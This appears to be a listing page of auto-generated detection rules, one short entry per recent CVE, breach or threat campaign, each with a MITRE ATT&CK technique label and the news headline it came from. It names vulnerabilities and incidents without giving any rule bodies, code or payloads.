CVE-2026-42285: GoBGP Malformed UPDATE causing Nil Pointer Dereference
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42285: Critical GoBGP Flaw Allows Remote Crash v...
CVE-2026-42010: GnuTLS RSA-PSK Null Byte Authentication Bypass Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42010: GnuTLS RSA-PSK NUL Byte Authentication By...
🛡️ 2 more rules via /detect
GoBGP DoS - Malformed BGP UPDATE Message (CVE-2026-41642)
🌐 NVDT1499 — Impact
Auto-generated from GoBGP DoS Vulnerability (CVE-2026-41642) Patched in Versi...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-3953
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-3953: Gosoft Proticaret E-Commerce XSS Vulnerabi...
🛡️ 2 more rules via /detect
CVE-2025-68060: WPMart Team Member Plugin SQL Injection Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2025-68060: High-Severity SQL Injection in WPMart Tea...
🛡️ 2 more rules via /detect
CVE-2025-1978: Hitachi Storage Navigator RCE via Crafted Request
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2025-1978: Hitachi Storage RCE Vulnerability Exposes ...
🛡️ 2 more rules via /detect
CVE-2024-43384: Root Password Exposure via Improper Information Removal
🌐 NVDT1552 — Credential Access
Auto-generated from CVE-2024-43384: Root Password Exposure via Improper Infor...
🛡️ 2 more rules via /detect
CVE-2025-9661 - Hitachi VSP One Block OS Command Injection via Maintenance Utility
🌐 NVDT1190 — Initial Access
Auto-generated from Hitachi VSP One Block OS Command Injection (CVE-2025-9661...
🛡️ 2 more rules via /detect
CVE-2026-7252 - WP-Optimize Arbitrary File Deletion via wp-config.php
🌐 NVDT1490 — Impact
Auto-generated from WP-Optimize Plugin Flaw Allows Arbitrary File Deletion, R...
🛡️ 2 more rules via /detect
CVE-2026-6692: WordPress Slider Revolution Arbitrary File Upload
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6692: WordPress Slider Revolution RCE Vulnerability
🛡️ 2 more rules via /detect
CVE-2026-4348: BetterDocs Pro SQL Injection via AJAX
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-4348: Unauthenticated SQLi in BetterDocs Pro Wor...
🛡️ 2 more rules via /detect
CVE-2026-41641 - NocoBase SQL Injection via sqlCollection:update
🌐 NVDT1190 — Initial Access
Auto-generated from NocoBase SQL Injection Bypass (CVE-2026-41641) Exposes Data
🛡️ 2 more rules via /detect
YesWiki Bazar Module SQL Injection Attempt (CVE-2026-41143)
🌐 NVDT1190 — Initial Access
Auto-generated from YesWiki SQL Injection (CVE-2026-41143) Risks Data Exposure
🛡️ 2 more rules via /detect
CVE-2026-41139 - Math.js Arbitrary Code Execution via Expression Parser
🌐 NVDT1190 — Initial Access
Auto-generated from Math.js Arbitrary Code Execution via Expression Parser (C...
🛡️ 1 more rules via /detect
CVE-2026-41670: Admidio SAML IdP AssertionConsumerServiceURL Manipulation
🌐 NVDT1566.003 — Initial Access
Auto-generated from CVE-2026-41670: Admidio SAML IdP Bypass Exposes User Data
🛡️ 2 more rules via /detect
CVE-2026-41669: Admidio SAML Signature Bypass - Unsigned AuthnRequest
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41669: Admidio SAML Signature Bypass Puts User M...
🛡️ 1 more rules via /detect
Admidio CVE-2026-41660: Non-Admin User Resets Admin 2FA
🌐 NVDT1531 — Privilege Escalation
Auto-generated from Admidio CVE-2026-41660: Logic Error Allows 2FA Bypass for...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-41640
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41640: NocoBase No-Code Platform SQL Injection
🛡️ 3 more rules via /detect
CVE-2026-41201: CI4MS Backup Module Stored XSS Payload
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41201: Critical CI4MS Account Takeover Via Store...
🛡️ 2 more rules via /detect
CVE-2026-41142: OpenEXR Heap OOB Write via ImageChannel::resize
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41142: OpenEXR Integer Overflow Leads to Heap OO...
🛡️ 2 more rules via /detect
Spring Cloud Config Server TOCTOU Base Directory Manipulation - CVE-2026-41002
🌐 NVDT1190 — Initial Access
Auto-generated from Spring Cloud Config Server Vulnerable to TOCTOU Attacks (...
🛡️ 2 more rules via /detect
CVE-2026-40982 - Spring Cloud Config Directory Traversal
🌐 NVDT1190 — Initial Access
Auto-generated from Spring Cloud Config Vulnerability CVE-2026-40982 Allows D...
🛡️ 1 more rules via /detect
Spring Cloud Config GCP Secrets Exposure - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-40981: Spring Cloud Config Exposes GCP Secrets
🛡️ 2 more rules via /detect
APT37 BirdCall Malware - Suspicious Sqgame App Activity
Breach IntelT1190 — Initial Access
Auto-generated from North Korean APT37 Targets Ethnic Koreans in China with B...
🛡️ 2 more rules via /detect
CVE-2026-40281 - Gotenberg PDF API Arbitrary File Overwrite via Metadata Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Gotenberg PDF API Vulnerability CVE-2026-40281 Allows Arb...
🛡️ 2 more rules via /detect
CVE-2026-8032 - PicoTronica e-Clinic Hardcoded Credential Access
🌐 NVDT1190 — Initial Access
Auto-generated from PicoTronica e-Clinic Healthcare System Hard-Coded Credent...
🛡️ 2 more rules via /detect
CVE-2026-44118: OpenClaw Loopback Owner Context Spoofing Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from OpenClaw CVE-2026-44118: Loopback Owner Context Spoofing ...
🛡️ 1 more rules via /detect
CVE-2026-44116 - OpenClaw Zalo Plugin SSRF Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from OpenClaw Zalo Plugin SSRF Vulnerability (CVE-2026-44116) ...
🛡️ 2 more rules via /detect
CVE-2026-44115: OpenClaw Shell Expansion Bypass in Heredoc
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-44115: OpenClaw Vulnerability Allows Shell Expan...
🛡️ 1 more rules via /detect
CVE-2026-44114 - OpenClaw Environment Namespace Override
🌐 NVDT1574.002 — Execution
Auto-generated from OpenClaw Vulnerability: Environment Namespace Override Po...
🛡️ 2 more rules via /detect
CVE-2026-44110 OpenClaw Authorization Bypass via DM Pairing
🌐 NVDT1531 — Impact
Auto-generated from OpenClaw Authorization Bypass (CVE-2026-44110) Exposes Ro...
🛡️ 2 more rules via /detect
CVE-2026-44109 - OpenClaw Feishu Webhook Authentication Bypass
🌐 NVDT1190 — Initial Access
Auto-generated from OpenClaw Authentication Bypass: Critical Vulnerability in...
🛡️ 2 more rules via /detect
OpenClaw Revoked Bearer Token Access - CVE-2026-43585
🌐 NVDT1190 — Initial Access
Auto-generated from OpenClaw Vulnerability Allows Revoked Bearer Tokens to Re...
🛡️ 2 more rules via /detect
CVE-2026-43584: OpenClaw Environment Variable Override (VIMINIT/EXINIT)
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-43584: OpenClaw Environment Variable Vulnerabili...
🛡️ 2 more rules via /detect
CVE-2026-43581: OpenClaw DevTools Protocol Exposed on 0.0.0.0
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-43581: Critical OpenClaw Sandbox Vulnerability E...
🛡️ 2 more rules via /detect
CVE-2026-43580: OpenClaw Incomplete Navigation Guard Bypass
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-43580: OpenClaw Vulnerability Bypasses SSRF Prot...
🛡️ 2 more rules via /detect
CVE-2026-43578: OpenClaw Privilege Escalation via Untrusted Completion Content
🌐 NVDT1068 — Privilege Escalation
Auto-generated from CVE-2026-43578: OpenClaw Privilege Escalation Hits Critic...
🛡️ 2 more rules via /detect
CVE-2026-43576 - OpenClaw WebSocket SSRF to Arbitrary Host
🌐 NVDT1190 — Initial Access
Auto-generated from OpenClaw SSRF Vulnerability (CVE-2026-43576) Allows Untru...
🛡️ 2 more rules via /detect
CVE-2026-43575: OpenClaw Auth Bypass via noVNC Helper Route
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-43575: OpenClaw Critical Auth Bypass Exposes Bro...
🛡️ 2 more rules via /detect
CVE-2026-41938: Vvveb Unrestricted File Upload of .htaccess
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41938: Vvveb Unrestricted File Upload Leads to RCE
🛡️ 2 more rules via /detect
CVE-2026-41936: Vvveb XXE File Disclosure via XML Import
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41936: Vvveb XXE Allows File Disclosure, Privile...
🛡️ 2 more rules via /detect
CVE-2026-41934 - Vvveb Authenticated RCE via Malicious .htaccess Upload
🌐 NVDT1190 — Initial Access
Auto-generated from Vvveb RCE: Authenticated Users Can Achieve Unauthenticate...
🛡️ 2 more rules via /detect
CVE-2026-41930: Vvveb phpMyAdmin Unauthenticated Access via Hardcoded Credentials
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41930: Vvveb Docker Hard-Coded Credentials Lead ...
🛡️ 2 more rules via /detect
HCL BigFix Service Management SX Privilege Escalation via Broken Access Control - CVE-2024-30151
🌐 NVDT1068 — Privilege Escalation
Auto-generated from HCL BigFix Service Management Privilege Escalation (CVE-2...
🛡️ 2 more rules via /detect
Cisco Crosswork/NSO DoS Exploit Attempt
Breach IntelT1499 — Impact
Auto-generated from Cisco DoS Flaw Hits Network Controllers, Requires Manual ...
🛡️ 2 more rules via /detect
CVE-2026-20188 - Cisco Crosswork/NSO Excessive Connection Attempts
🌐 NVDT1499 — Impact
Auto-generated from Cisco Crosswork, NSO DoS Vulnerability (CVE-2026-20188)
🛡️ 1 more rules via /detect
CVE-2026-20185: Cisco SG350/SG350X SNMP DoS Attempt
🌐 NVDT1499 — Impact
Auto-generated from CVE-2026-20185: Cisco SG350/SG350X SNMP DoS Vulnerability
🛡️ 1 more rules via /detect
CVE-2026-20034: Cisco Unity Connection Authenticated RCE via Crafted API Request
🌐 NVDT1190 — Initial Access
Auto-generated from Cisco Unity Connection: Authenticated RCE Via Web Managem...
🛡️ 2 more rules via /detect
Supply Chain Compromise - DAEMON Tools Lite Download
Breach IntelT1190 — Initial Access
Auto-generated from DAEMON Tools Supply Chain Attack Confirmed, Malware-Free ...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6691
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6691: MongoDB C Driver Heap Overflow via GSSAPI ...
🛡️ 2 more rules via /detect
MuddyWater Teams Phishing with Decoy Ransomware
Breach IntelT1566.001 — Initial Access
Auto-generated from MuddyWater Uses Chaos Ransomware as Decoy for Microsoft T...
🛡️ 2 more rules via /detect
CVE-2025-31951 HCL BigFix RunBookAI Command Smuggling Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from HCL BigFix RunBookAI Vulnerability Allows Command Smuggling
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-1719
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Gravity Bookings Plugin Vulnerable to SQL Injec...
🛡️ 3 more rules via /detect
LegionProxy Data Breach - Customer Data Exposure
Breach IntelT1537 — Impact
Auto-generated from LegionProxy Breach Exposes 10,000 Accounts
🛡️ 2 more rules via /detect
Android Binary Transparency Verification Failure
Breach IntelT1553.004 — Defense Evasion
Auto-generated from Google Expands Android Binary Transparency to Counter Sup...
🛡️ 2 more rules via /detect
CloudZ RAT and Pheno Plugin - Windows Phone Link Process Execution
Breach IntelT1190 — Initial Access
Auto-generated from CloudZ RAT and Pheno Plugin Target Windows Phone Link for...
🛡️ 2 more rules via /detect
CVE-2026-7841 - GeoVision GV-ASWeb Notification Settings RCE
🌐 NVDT1190 — Initial Access
Auto-generated from GeoVision GV-ASWeb RCE: High-Severity Flaw Affects Notifi...
🛡️ 1 more rules via /detect
CVE-2026-7448: WordPress LatePoint Plugin Unauthenticated Stored XSS via first_name
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7448: WordPress LatePoint Plugin Open to Unauthe...
🛡️ 1 more rules via /detect
CVE-2026-7332: WordPress LatePoint Plugin Stored XSS via booking_form_page_url
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7332: WordPress LatePoint Plugin XSS Flaw Expose...
🛡️ 1 more rules via /detect
Palo Alto Networks Captive Portal Zero-Day Exploitation Attempt
Breach IntelT1190 — Initial Access
Auto-generated from Palo Alto Networks Zero-Day Exploited to Hack Firewalls
🛡️ 2 more rules via /detect
CVE-2025-71256: nr Modem DoS - Potential Malformed Request
🌐 NVDT1499 — Impact
Auto-generated from CVE-2025-71256: nr Modem DoS Vulnerability Poses High Risk
🛡️ 2 more rules via /detect
CVE-2025-71255: Modem IMS Remote DoS via Improper Input Validation
🌐 NVDT1499 — Impact
Auto-generated from CVE-2025-71255: Modem IMS Vulnerability Exposes Devices t...
CVE-2025-71254 - Modem IMS DoS - Malformed IMS Packet
🌐 NVDT1499 — Impact
Auto-generated from Modem IMS DoS Vulnerability (CVE-2025-71254) Poses Remote...
🛡️ 2 more rules via /detect
Modem IMS Improper Input Validation DoS Attempt - CVE-2025-71253
🌐 NVDT1499 — Impact
Auto-generated from Modem IMS Vulnerability (CVE-2025-71253) Allows Remote DoS
🛡️ 1 more rules via /detect
CVE-2025-71252: Modem IMS Improper Input Validation DoS Attempt
🌐 NVDT1499 — Impact
Auto-generated from CVE-2025-71252: Modem IMS Vulnerability Exposes Remote Do...
🛡️ 1 more rules via /detect
CVE-2025-71251: IMS DoS - Malformed SIP Request
🌐 NVDT1499 — Impact
Auto-generated from CVE-2025-71251: IMS DoS Vulnerability Poses High Risk
🛡️ 1 more rules via /detect
Trellix Source Code Leak - Potential Reconnaissance
Breach IntelT1083 — Discovery
Auto-generated from Trellix Source Code Breach Exposes Supply Chain Risks
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7857
🌐 NVDT1190 — Initial Access
Auto-generated from D-Link DI-8100 Router Vulnerable to Remote Buffer Overflo...
🛡️ 2 more rules via /detect
CVE-2026-7856 D-Link DI-8100 Web Management Buffer Overflow Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from D-Link DI-8100 Buffer Overflow (CVE-2026-7856) Exposes We...
ProFTPD SQL Injection via Reverse DNS Lookup - CVE-2026-44331
🌐 NVDT1190 — Initial Access
Auto-generated from ProFTPD SQL Injection (CVE-2026-44331) Exposes Servers to...
🛡️ 2 more rules via /detect
MedusaLocker Ransomware Activity
Breach IntelT1486 — Impact
Auto-generated from MedusaLocker Leaks Magnolia Data After Ransom Refusal
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7855
🌐 NVDT1190 — Initial Access
Auto-generated from D-Link DI-8100 Buffer Overflow - CVE-2026-7855 Public Exp...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7854
🌐 NVDT1190 — Initial Access
Auto-generated from D-Link DI-8100 Critical Buffer Overflow (CVE-2026-7854)
🛡️ 2 more rules via /detect
CVE-2026-42997 - OpenStack Ironic Molds Remote Token Request
🌐 NVDT1190 — Initial Access
Auto-generated from OpenStack Ironic Vulnerability CVE-2026-42997 Exposes Key...
🛡️ 1 more rules via /detect
CVE-2026-27960 - OpenCTI Unauthenticated API Access for User Enumeration
🌐 NVDT1190 — Initial Access
Auto-generated from OpenCTI Critical Auth Bypass: Unauthenticated API Access ...
🛡️ 2 more rules via /detect
CVE-2026-7853 - D-Link DI-8100 HTTP Handler Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from D-Link DI-8100 Critical Buffer Overflow (CVE-2026-7853) P...
CVE-2026-7851 D-Link DI-8100 yyxz.asp Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from D-Link DI-8100 Router Vulnerability: Remote Stack Buffer ...
🛡️ 1 more rules via /detect
Grok AI Fraud - Morse Code Username Command Execution
Breach IntelT1566.002 — Initial Access
Auto-generated from Grok Bypassed for $200k Crypto Theft via Morse Code in Us...
🛡️ 2 more rules via /detect
Ransomware Indicators — Karakurt Supply Chain
Breach Intelransomware — event-type
Auto-generated from Conti, Akira Ransomware Affiliate Sentenced to 8 Years
🛡️ 1 more rules via /detect
Apache HTTP/2 Double Free DoS/RCE Attempt (CVE-2026-23918)
Breach IntelT1190 — Initial Access
Auto-generated from Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS, Potentia...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7412
🌐 NVDT1190 — Initial Access
Auto-generated from Eclipse BaSyx Server SDK Vulnerability Bypasses Network S...
🛡️ 3 more rules via /detect
CVE-2026-7411 - Eclipse BaSyx Path Traversal File Upload
🌐 NVDT1190 — Initial Access
Auto-generated from Eclipse BaSyx RCE: Critical Path Traversal in Server SDK
🛡️ 2 more rules via /detect
Supply Chain Compromise - DAEMON Tools Installer Execution
Breach IntelT1190 — Initial Access
Auto-generated from DAEMON Tools Supply Chain Attack Compromises Official Ins...
🛡️ 2 more rules via /detect
CVE-2026-7834: EFM ipTIME NAS1dual get_csrf_whites Stack Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7834: Critical Stack-Based Buffer Overflow in EF...
WeePie Cookie Allow Plugin SQLi via 'consent' parameter - CVE-2026-4304
🌐 NVDT1190 — Initial Access
Auto-generated from WeePie Cookie Allow Plugin SQLi Risks Unauthenticated Dat...
🛡️ 2 more rules via /detect
Detecting Use of Known EOL Component Exploitation
Breach IntelT1190 — Initial Access
Auto-generated from EOL Software Creates CVE Blind Spots in SCA Tools
🛡️ 2 more rules via /detect
CVE-2026-7833: EFM ipTIME C200 Remote Command Injection via ApplyRestore Endpoint
🌐 NVDT1190 — Initial Access
Auto-generated from EFM ipTIME C200 Vulnerability: Remote Command Injection E...
🛡️ 2 more rules via /detect
CVE-2026-7832 - IObit Advanced SystemCare Symlink Following
🌐 NVDT1574.006 — Privilege Escalation
Auto-generated from IObit Advanced SystemCare 19: High-Severity Symlink Follo...
🛡️ 2 more rules via /detect
Google Chrome AI-Discovered Vulnerability - Potential Exploit Attempt
Breach IntelT1190 — Initial Access
Auto-generated from Google Chrome Bugs Found by AI Earn $57,000 Bug Bounty
🛡️ 2 more rules via /detect
THSRC SDR Attack - Emergency Signal Transmission
Breach IntelT1573.001 — Impact
Auto-generated from Taiwan High Speed Rail Emergency Stop Caused by SDR Attack
🛡️ 2 more rules via /detect
Vimeo Data Breach - ShinyHunters Extortion
Breach IntelT1190 — Initial Access
Auto-generated from Vimeo Data Breach Exposes Personal Information of 119,000
🛡️ 2 more rules via /detect
CVE-2026-43533: OpenClaw QQBot Arbitrary File Read via Malicious Media Tag
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-43533: OpenClaw QQBot Arbitrary File Read Vulner...
🛡️ 2 more rules via /detect
OpenClaw SSRF Policy Bypass via /tabs/action - CVE-2026-42439
🌐 NVDT1190 — Initial Access
Auto-generated from OpenClaw Server-Side Request Forgery Policy Bypass (CVE-2...
🛡️ 2 more rules via /detect
OpenClaw Sandbox Escape via Host Override - CVE-2026-42434
🌐 NVDT1560.001 — Defense Evasion
Auto-generated from OpenClaw Sandbox Escape (CVE-2026-42434) Allows Remote Ex...
🛡️ 2 more rules via /detect
CVE-2023-54348 - ERPGo SaaS CSV Injection via Vendor Name
🌐 NVDT1190 — Initial Access
Auto-generated from ERPGo SaaS 3.9 CSV Injection Allows RCE via Vendor Fields
🛡️ 2 more rules via /detect
CVE-2023-54345 - Frappe Framework ERPNext Server Script Creation
🌐 NVDT1059.001 — Execution
Auto-generated from Frappe Framework ERPNext Sandbox Escape Allows RCE via CV...
🛡️ 2 more rules via /detect
CVE-2023-54342 Eclipse Equinox OSGi Unauthenticated RCE via Console
🌐 NVDT1190 — Initial Access
Auto-generated from Eclipse Equinox OSGi RCE: Critical Vulnerability Allows U...
🛡️ 2 more rules via /detect
Android System Component RCE - CVE-2026-0073
Breach IntelT1190 — Initial Access
Auto-generated from Android Critical RCE Vulnerability Patched in System Comp...
🛡️ 2 more rules via /detect
Exploitation Attempt — Google
Breach Intelvulnerability — event-type
Auto-generated from OAuth Tokens: The Persistent Backdoor Most Teams Miss
MetInfo CMS PHP Code Injection (CVE-2026-29014)
Breach IntelT1190 — Initial Access
Auto-generated from MetInfo CMS CVE-2026-29014 Exploited for RCE Attacks
🛡️ 2 more rules via /detect
CVE-2026-6322: Suspicious URI Authority Hijacking Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6322: fast-uri Vulnerability Enables URI Authori...
🛡️ 1 more rules via /detect
Trellix Source Code Access - Suspicious Git Activity
Breach IntelT1190 — Initial Access
Auto-generated from Trellix Source Code Access Confirmed by Security Vendor
🛡️ 2 more rules via /detect
CVE-2026-3359: WordPress Form Maker SQL Injection via 'inputs' parameter
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-3359: WordPress Form Maker Plugin SQLi Exposes Data
🛡️ 1 more rules via /detect
WhatsApp File Spoofing Attempt
Breach IntelT1190 — Initial Access
Auto-generated from WhatsApp Patches File Spoofing and URL Scheme Vulnerabili...
🛡️ 1 more rules via /detect
CVE-2026-5192: Forminator Plugin Path Traversal - File Read Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-5192: Forminator WordPress Plugin Path Traversal...
🛡️ 2 more rules via /detect
CVE-2026-40797: WebinarIgnition Blind SQL Injection Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from WebinarIgnition: Critical Blind SQL Injection CVE-2026-40797
🛡️ 2 more rules via /detect
CVE-2026-7823: Totolink A8000RU Command Injection via cgi-bin
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7823: Critical Command Injection in Totolink A80...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7812
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7812: Remote Command Injection in 54yyyu code-mc...
🛡️ 2 more rules via /detect
CVE-2026-7811: Path Traversal in 54yyyu code-mcp MCP File Handler
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7811: High-Severity Path Traversal in 54yyyu cod...
🛡️ 2 more rules via /detect
CVE-2026-7810: Python Notebook Path Traversal via create_notebook
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7810: Python Notebook Path Traversal Exposes Ser...
🛡️ 3 more rules via /detect
CVE-2026-4803: Royal Elementor Addons Stored XSS via wpr_update_form_action_meta AJAX
🌐 NVDT1190 — Initial Access
Auto-generated from Royal Elementor Addons XSS Vulnerability (CVE-2026-4803) ...
🛡️ 2 more rules via /detect
CVE-2026-35228 - Oracle MCP Server Helper Tool SQL Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Oracle MCP Server Helper Tool Vulnerability Allows Malici...
🛡️ 2 more rules via /detect
CVE-2026-3456: WordPress GeekyBot Plugin SQL Injection Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-3456: WordPress GeekyBot Plugin SQL Injection
🛡️ 2 more rules via /detect
CVE-2026-5100 - AWP Classifieds SQL Injection Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from AWP Classifieds Plugin SQLi Exposes WordPress Sites
🛡️ 2 more rules via /detect
CVE-2025-13618: WordPress Mentoring Plugin Admin Registration
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2025-13618: WordPress Mentoring Plugin Allows Admin A...
🛡️ 2 more rules via /detect
CVE-2026-5722: MoreConvert Pro WordPress Authentication Bypass via Guest Waitlist
🌐 NVDT1190 — Initial Access
Auto-generated from MoreConvert Pro WordPress Plugin Critical Authentication ...
🛡️ 1 more rules via /detect
Vimeo Data Leak - Anodot Vendor Compromise
Breach IntelT1560 — Collection
Auto-generated from Vimeo Breach: ShinyHunters Leaks User Data via Third-Part...
🛡️ 2 more rules via /detect
CVE-2026-44028: Nix/Lix Unbounded Recursion in NAR Parser
🌐 NVDT1059.004 — Privilege Escalation
Auto-generated from CVE-2026-44028: Nix/Lix Unbounded Recursion Leads to RCE ...
🛡️ 2 more rules via /detect
CVE-2026-7788 - Axle-Bucamp MCP-Docusaurus Path Traversal
🌐 NVDT1190 — Initial Access
Auto-generated from Axle-Bucamp MCP-Docusaurus Path Traversal (CVE-2026-7788)...
🛡️ 2 more rules via /detect
CVE-2026-7785: Wireshark-MCP OS Command Injection via quick_capture
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-7785: Wireshark-MCP OS Command Injection Hits Hi...
🛡️ 2 more rules via /detect
CVE-2026-7784: NagaAgent Path Traversal via Name Parameter
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7784: NagaAgent Path Traversal Exposes Servers
🛡️ 2 more rules via /detect
CVE-2026-7791 - Local Privilege Escalation via Skylight Workspace Config Service Log Rotation
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Amazon WorkSpaces Escalation: Local User to SYSTEM via Lo...
🛡️ 2 more rules via /detect
CVE-2026-7776: Boundary Worker TLS Handshake DoS Attempt
🌐 NVDT1499 — Impact
Auto-generated from CVE-2026-7776: Boundary Workers Vulnerable to DoS During ...
🛡️ 1 more rules via /detect
CVE-2026-22679 - Weaver E-cology Command Execution
Breach IntelT1059 — Execution
Auto-generated from Weaver E-cology Critical Bug Exploited in Attacks Since M...
🛡️ 2 more rules via /detect
CVE-2026-42222 - Unauthenticated Nginx UI Installation API Access
🌐 NVDT1190 — Initial Access
Auto-generated from Nginx UI Vulnerability: Unauthenticated Bootstrap Takeove...
🛡️ 2 more rules via /detect
CVE-2026-42221: Nginx UI Initial Admin Takeover via /api/install
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42221: Nginx UI Admin Takeover Vulnerability
🛡️ 1 more rules via /detect
Handala Group Document Exfiltration from Fujairah Port
Breach IntelT1048 — Exfiltration
Auto-generated from Handala Group Claims Fujairah Port Cyberattack Amid Missi...
🛡️ 2 more rules via /detect
CVE-2026-7768: Fastify Unbounded Accept Header Cache Exhaustion Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7768: Fastify Accepts-Serializer DoS Vulnerability
🛡️ 1 more rules via /detect
CVE-2026-6321: fast-uri Path Normalization Bypass Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6321: fast-uri Path Normalization Bypass
🛡️ 1 more rules via /detect
CVE-2026-42154: Prometheus Unauthenticated Memory Exhaustion via /api/v1/read
🌐 NVDT1190 — Initial Access
Auto-generated from Prometheus CVE-2026-42154: Unauthenticated Memory Exhaust...
🛡️ 1 more rules via /detect
Prometheus Azure AD OAuth Secret Exposed via /-/config API — CVE-2026-42151
🌐 NVDT1078.004 — Credential Access
Auto-generated from Prometheus Azure AD OAuth Secret Exposed via Plaintext Co...
🛡️ 2 more rules via /detect
cPanel Authentication Bypass Exploit Attempt
Breach IntelT1190 — Initial Access
Auto-generated from cPanel Authentication Bypass Vulnerability Exploited in t...
🛡️ 2 more rules via /detect
CVE-2026-43616 - Detect-It-Easy Path Traversal Arbitrary File Write
🌐 NVDT1190 — Initial Access
Auto-generated from Detect-It-Easy Path Traversal Allows Arbitrary File Write...
🛡️ 2 more rules via /detect
CVE-2026-42796: Arelle Unauthenticated RCE via /rest/configure
🌐 NVDT1190 — Initial Access
Auto-generated from Arelle RCE: Unauthenticated Remote Code Execution in REST...
🛡️ 2 more rules via /detect
CVE-2026-42087 - OpenC3 COSMOS TSDB SQL Injection
🌐 NVDT1190 — Initial Access
Auto-generated from OpenC3 COSMOS TSDB SQL Injection Flaw Exposes Critical Sy...
🛡️ 2 more rules via /detect
CVE-2026-42084: OpenC3 COSMOS Password Change Without Old Password
🌐 NVDT1550.003 — Persistence
Auto-generated from CVE-2026-42084: OpenC3 COSMOS Allows Password Change With...
🛡️ 1 more rules via /detect
CVE-2026-41571: Note Mark Authentication Bypass via 'null' Password
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41571: Note Mark Critical Auth Bypass
🛡️ 1 more rules via /detect
CVE-2026-41471: PayPal Events WordPress Plugin Unauthenticated Order Enumeration
🌐 NVDT1075 — Discovery
Auto-generated from CVE-2026-41471: PayPal Events WordPress Plugin Exposes Al...
🛡️ 2 more rules via /detect
CVE-2026-32834: WordPress Easy PayPal Plugin Authentication Bypass via QR Code Scan
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-32834: WordPress Easy PayPal Plugin Authenticati...
🛡️ 1 more rules via /detect
USB Device Connection Monitoring
🌐 NVDT1200 — Initial Access
Auto-generated from BusyBox udhcpc6 Heap Overflow (CVE-2026-29004) Exposes Em...
Monitor Authentication from Breached Vendor — Infrastructure
Breach Inteldata-breach — event-type
Auto-generated from Infrastructure Education Company Reports Cyber Incident, ...
🛡️ 1 more rules via /detect
Apache Iceberg Metadata Path Alteration - CVE-2026-42812
🌐 NVDT1505.003 — Persistence
Auto-generated from Apache Iceberg CVE-2026-42812 Bypasses Metadata Location ...
🛡️ 2 more rules via /detect
CVE-2026-42811: Apache Polaris Crafted Namespace/Table Name for GCS Credential Bypass
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42811: Apache Polaris Credential Bypass Exposes ...
🛡️ 2 more rules via /detect
CVE-2026-42810: Apache Polaris S3 Wildcard Namespace/Table Access
🌐 NVDT1568.002 — Lateral Movement
Auto-generated from CVE-2026-42810: Apache Polaris S3 Wildcard Vulnerability ...
🛡️ 2 more rules via /detect
CVE-2026-42376: D-Link DIR-456U Hardcoded Telnet Backdoor Credentials
🌐 NVDT1110.001 — Credential Access
Auto-generated from CVE-2026-42376: D-Link DIR-456U EOL Router Exposes Critic...
🛡️ 3 more rules via /detect
CVE-2026-42375 D-Link DIR-600L Telnet Daemon Startup
